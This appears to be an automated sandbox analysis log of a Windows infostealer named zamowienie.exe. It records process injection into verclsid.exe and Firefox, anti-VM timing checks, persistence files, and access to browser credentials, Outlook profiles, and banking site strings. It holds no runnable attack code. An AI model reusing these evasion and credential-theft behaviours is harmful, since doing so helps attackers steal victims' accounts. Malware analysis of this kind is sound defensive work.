    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EB52207_2_02EB5220
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EA11227_2_02EA1122
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EB34607_2_02EB3460
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02ECB8C07_2_02ECB8C0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAE65C7_2_04DAE65C
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAE7EF7_2_04DAE7EF
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAD7287_2_04DAD728
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAE1A57_2_04DAE1A5
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04DAE2C37_2_04DAE2C3
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: String function: 04F2EA12 appears 86 times
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: String function: 04F07E54 appears 111 times
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: String function: 04EAB970 appears 280 times
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: String function: 04F3F290 appears 105 times
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: String function: 04EF5130 appears 58 times
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: String function: 34F6EA12 appears 84 times
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: String function: 34F35130 appears 58 times
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: String function: 34F47E54 appears 111 times
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: String function: 34F7F290 appears 105 times
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: String function: 34EEB970 appears 280 times
    Source: zamowienie.exe Static PE information: invalid certificate
    Source: zamowienie.exe, 00000003.00000003.2844137125.0000000034E42000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs zamowienie.exe
    Source: zamowienie.exe, 00000003.00000003.2842153780.0000000034C85000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs zamowienie.exe
    Source: zamowienie.exe, 00000003.00000003.2902140294.0000000004DF6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameverclsid.exej% vs zamowienie.exe
    Source: zamowienie.exe, 00000003.00000003.2902118172.0000000004E31000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameverclsid.exej% vs zamowienie.exe
    Source: zamowienie.exe, 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs zamowienie.exe
    Source: zamowienie.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engine Classification label: mal92.troj.spyw.evad.winEXE@7/15@8/7
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 0_2_004034F1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,LdrInitializeThunk,GetVersionExA,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 0_2_004048F0 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,LdrInitializeThunk,SetDlgItemTextA
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 0_2_00402198 LdrInitializeThunk,LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk
    Source: C:\Users\user\Desktop\zamowienie.exe File created: C:\Users\user\AppData\Local\realmless
    Source: C:\Users\user\Desktop\zamowienie.exe File created: C:\Users\user\AppData\Local\Temp\nsa2862.tmp
    Source: zamowienie.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\zamowienie.exe File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\zamowienie.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: verclsid.exe, 00000007.00000003.3127092580.0000000003243000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3126986417.0000000003222000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3906236377.0000000003271000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3906236377.0000000003243000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: C:\Users\user\Desktop\zamowienie.exe File read: C:\Users\user\Desktop\zamowienie.exe
    Source: unknown Process created: C:\Users\user\Desktop\zamowienie.exe "C:\Users\user\Desktop\zamowienie.exe"
    Source: C:\Users\user\Desktop\zamowienie.exe Process created: C:\Users\user\Desktop\zamowienie.exe "C:\Users\user\Desktop\zamowienie.exe"
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
    Source: C:\Windows\SysWOW64\verclsid.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: propsys.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: dwmapi.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: oleacc.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: ntmarta.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: version.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: shfolder.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: riched20.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: usp10.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: msls31.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: textinputframework.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: coreuicomponents.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: iertutil.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: powrprof.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: wkscli.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: netutils.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: umpdc.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: wininet.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: winnsi.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: urlmon.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: srvcli.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: fwpuclnt.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: schannel.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: mskeyprotect.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: ntasn1.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: dpapi.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: gpapi.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: ncrypt.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Section loaded: ncryptsslp.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: wininet.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: ieframe.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: version.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: wkscli.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: mlang.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: winsqlite3.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: vaultcli.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: cryptbase.dll
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe Section loaded: wininet.dll
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe Section loaded: mswsock.dll
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe Section loaded: dnsapi.dll
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe Section loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe Section loaded: fwpuclnt.dll
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\zamowienie.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
    Source: synderegistres.lnk.0.dr LNK file: ..\..\Users\user\salrernes.Unl229
    Source: C:\Users\user\Desktop\zamowienie.exe File written: C:\ProgramData\Microsoft\Windows\Start Menu\eksportafgrde.ini
    Source: C:\Windows\SysWOW64\verclsid.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
    Source: zamowienie.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: zamowienie.exe, 00000003.00000001.2433379972.0000000000649000.00000020.00000001.01000000.00000007.sdmp
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dmQRVBQMPL.exe, 00000006.00000002.3906673030.0000000000D7E000.00000002.00000001.01000000.00000009.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3906681333.0000000000D7E000.00000002.00000001.01000000.00000009.sdmp
    Source: Binary string: wntdll.pdbUGP source: zamowienie.exe, 00000003.00000003.2844137125.0000000034D15000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842153780.0000000034B62000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.2949515842.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.2947332940.0000000004B26000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: zamowienie.exe, zamowienie.exe, 00000003.00000003.2844137125.0000000034D15000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842153780.0000000034B62000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, verclsid.exe, 00000007.00000003.2949515842.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.2947332940.0000000004B26000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: verclsid.pdbGCTL source: zamowienie.exe, 00000003.00000003.2902140294.0000000004DF6000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2902118172.0000000004E31000.00000004.00000020.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000006.00000002.3906341208.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: zamowienie.exe, 00000003.00000001.2433379972.0000000000649000.00000020.00000001.01000000.00000007.sdmp
    Source: Binary string: verclsid.pdb source: zamowienie.exe, 00000003.00000003.2902140294.0000000004DF6000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2902118172.0000000004E31000.00000004.00000020.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000006.00000002.3906341208.0000000000B88000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    Source: Yara match File source: 00000000.00000002.2435885467.0000000005488000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 0_2_73401B28 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_73401B28
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 3_2_34EC27FA pushad ; ret 3_2_34EC27F9
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 3_2_34EC225F pushad ; ret 3_2_34EC27F9
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 3_2_34EC283D push eax; iretd 3_2_34EC2858
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 3_2_34EF09AD push ecx; mov dword ptr [esp], ecx 3_2_34EF09B6
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04E827FA pushad ; ret 7_2_04E827F9
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04E8225F pushad ; ret 7_2_04E827F9
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04E8283D push eax; iretd 7_2_04E82858
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04EB09AD push ecx; mov dword ptr [esp], ecx 7_2_04EB09B6
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_02EB0B37 push ds; iretd 7_2_02EB0B40
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_02EB4FF9 push 00000065h; retf 7_2_02EB500E
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_02EBEC80 push edx; retn 134Bh 7_2_02EBED83
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_02EB7306 pushad ; ret 7_2_02EB7304
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_02EB74CD push esp; retf 7_2_02EB74D1
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_02EBBFC7 push eax; iretd 7_2_02EBBFCC
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DA5491 push ds; retf 7_2_04DA549F
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DA659E push 00000051h; iretd 7_2_04DA65B2
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DA5564 push eax; retf 7_2_04DA5566
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DAC6E5 push ecx; iretd 7_2_04DAC6AD
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DAC67D push ecx; iretd 7_2_04DAC6AD
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DAC60A push ecx; iretd 7_2_04DAC6AD
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DA47B3 push edi; ret 7_2_04DA47BA
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DAD02C push FFFFFFF7h; ret 7_2_04DAD02F
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DAB2A4 pushfd ; ret 7_2_04DAB305
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DA6258 push esp; ret 7_2_04DA6259
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DA737C pushfd ; iretd 7_2_04DA73BC
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DABD56 pushfd ; retf 7_2_04DABD57
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DA5E46 push ebp; ret 7_2_04DA5E61
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DA5E2D push ecx; retf 7_2_04DA5E39
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DAC869 push edi; iretd 7_2_04DAC86A
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DAC813 pushfd ; ret 7_2_04DAC814
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_04DA596F push 0000002Ch; ret 7_2_04DA5978
    Source: C:\Users\user\Desktop\zamowienie.exe File created: C:\Users\user\AppData\Local\Temp\nsz31BB.tmp\System.dll
    Source: C:\Users\user\Desktop\zamowienie.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\eksportafgrde.ini
    Source: C:\Users\user\Desktop\zamowienie.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\verclsid.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\zamowienie.exe API/Special instruction interceptor: Address: 5A73A5F
    Source: C:\Users\user\Desktop\zamowienie.exe API/Special instruction interceptor: Address: 3C33A5F
    Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FF8C88ED324
    Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
    Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FF8C88ED944
    Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FF8C88ED504
    Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FF8C88ED544
    Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
    Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FF8C88F0154
    Source: C:\Windows\SysWOW64\verclsid.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
    Source: C:\Users\user\Desktop\zamowienie.exe RDTSC instruction interceptor: First address: 5A39D50 second address: 5A39D50 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7A411E5F97h 0x00000006 cld 0x00000007 inc ebp 0x00000008 test bh, bh 0x0000000a inc ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\zamowienie.exe RDTSC instruction interceptor: First address: 3BF9D50 second address: 3BF9D50 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7A41C10FF7h 0x00000006 cld 0x00000007 inc ebp 0x00000008 test bh, bh 0x0000000a inc ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 3_2_34FC16A6 rdtsc 3_2_34FC16A6
    Source: C:\Windows\SysWOW64\verclsid.exe Window / User API: threadDelayed 3046
    Source: C:\Windows\SysWOW64\verclsid.exe Window / User API: threadDelayed 6927
    Source: C:\Users\user\Desktop\zamowienie.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz31BB.tmp\System.dll
    Source: C:\Users\user\Desktop\zamowienie.exe API coverage: 0.2 %
    Source: C:\Windows\SysWOW64\verclsid.exe API coverage: 2.6 %
    Source: C:\Windows\SysWOW64\verclsid.exe TID: 344 Thread sleep count: 3046 > 30
    Source: C:\Windows\SysWOW64\verclsid.exe TID: 344 Thread sleep time: -6092000s >= -30000s
    Source: C:\Windows\SysWOW64\verclsid.exe TID: 344 Thread sleep count: 6927 > 30
    Source: C:\Windows\SysWOW64\verclsid.exe TID: 344 Thread sleep time: -13854000s >= -30000s
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe TID: 6444 Thread sleep time: -35000s >= -30000s
    Source: C:\Windows\SysWOW64\verclsid.exe Last function: Thread delayed
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 0_2_00406751 FindFirstFileA,FindClose, 0_2_00406751
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 0_2_00405B80 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose, 0_2_00405B80
    Source: C:\Users\user\Desktop\zamowienie.exe Code function: 0_2_004027CF FindFirstFileA, 0_2_004027CF
    Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_02EBC460 FindFirstFileW,FindNextFileW,FindClose, 7_2_02EBC460
    Source: C:\Users\user\Desktop\zamowienie.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
    Source: C:\Users\user\Desktop\zamowienie.exe File opened: C:\Users\user
    Source: C:\Users\user\Desktop\zamowienie.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows
    Source: C:\Users\user\Desktop\zamowienie.exe File opened: C:\Users\user\AppData
    Source: C:\Users\user\Desktop\zamowienie.exe File opened: C:\Users\user\AppData\Local\Microsoft
    Source: C:\Users\user\Desktop\zamowienie.exe File opened: C:\Users\user\AppData\Local
    Source: 02-E8420l.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
    Source: 02-E8420l.7.dr Binary or memory string: discord.comVMware20,11696428655f
    Source: 02-E8420l.7.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
    Source: 02-E8420l.7.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
    Source: 02-E8420l.7.dr Binary or memory string: global block list test formVMware20,11696428655
    Source: 02-E8420l.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
    Source: zamowienie.exe, 00000003.00000002.2942527960.0000000004DAD000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842830620.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842798539.0000000004DE2000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2942603184.0000000004DE2000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842507580.0000000004DE2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
    Source: 02-E8420l.7.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
    Source: 02-E8420l.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
    Source: 02-E8420l.7.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
    Source: 02-E8420l.7.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
    Source: 02-E8420l.7.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
    Source: zamowienie.exe, 00000003.00000003.2842798539.0000000004DE2000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2942603184.0000000004DE2000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842507580.0000000004DE2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW!
    Source: 02-E8420l.7.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
    Source: 02-E8420l.7.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
    Source: 02-E8420l.7.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
    Source: 02-E8420l.7.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
    Source: verclsid.exe, 00000007.00000002.3906236377.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3906381253.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.3236323767.0000028604DAC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: 02-E8420l.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
    Source: 02-E8420l.7.dr Binary or memory string: outlook.office.comVMware20,11696428655s
    Source: 02-E8420l.7.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
    Source: 02-E8420l.7.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
